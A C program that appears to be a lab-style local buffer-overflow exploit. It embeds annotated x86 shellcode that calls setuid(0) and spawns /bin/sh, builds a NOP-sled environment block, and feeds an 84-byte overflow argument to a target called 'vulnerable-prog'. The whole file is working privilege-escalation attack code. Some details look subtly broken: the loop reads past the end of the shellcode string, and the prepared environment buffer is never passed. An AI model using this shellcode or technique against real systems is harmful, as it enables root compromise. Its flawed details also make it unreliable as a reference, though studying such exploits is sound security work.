#include <unistd.h>
#include <stdio.h>
#include <string.h>

/* 
Disassembled shellcode program (after doing some arrangements)
1:  31 c0                   xor    eax,eax			-
2:  31 db                   xor    ebx,ebx 	 		 |--> ?
4:  b0 d5                   mov    al,0xd5			 |
6:  cd 80                   int    0x80			    -

8:  eb 18                   jmp    0x22 			              -
a:  5e                      pop    esi				               |
b:  89 76 08                mov    DWORD PTR [esi+0x8],esi	 |
e:  31 c0                   xor    eax,eax	 		             |
10: 88 46 07                mov    BYTE PTR [esi+0x7],al  	 |
13: 89 46 0c                mov    DWORD PTR [esi+0xc],eax	 |
16: b0 0b                   mov    al,0xb 	 		             |--> Shellcode Assembly Code
18: 89 f3                   mov    ebx,esi	 		             |
1a: 8d 4e 08                lea    ecx,[esi+0x8] 	 	         |
1d: 8d 56 0c                lea    edx,[esi+0xc] 	 	         |
20: cd 80                   int    0x80 	 		               |
22: e8 e3 ff ff ff          call   0xa 	 			               |
23 .ascii "/bin/sh<garbage>" 					                      -
*/

#define SHELLCODE "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"

#define ENV_BLOCK_SIZE 127000
#define OVF_BUF_SIZE 84

int main(void) {
  char envbuf[ENV_BLOCK_SIZE + 1];
  char ovfbuf[OVF_BUF_SIZE + 1];
  char *argv[3];
  char *envp[2];
  int i;

  memcpy(envbuf, "SHELLCODE=", 10);
  memset(envbuf + 10, 0x90, ENV_BLOCK_SIZE - 10 - strlen(SHELLCODE));
  memcpy(envbuf + ENV_BLOCK_SIZE - OVF_BUF_SIZE, SHELLCODE, strlen(SHELLCODE));
  envbuf[ENV_BLOCK_SIZE] = '\0';

  for (i = 0; i < OVF_BUF_SIZE; i++) {
     	ovfbuf[i] = SHELLCODE[i];
  }
  ovfbuf[i] = '\0';

  argv[0] = "vulnerable-prog"; // "vulnerable";
  argv[1] = ovfbuf;
  argv[2] = NULL;

  envp[0] = NULL;
  envp[1] = NULL;

  execve(argv[0], argv, envp);
}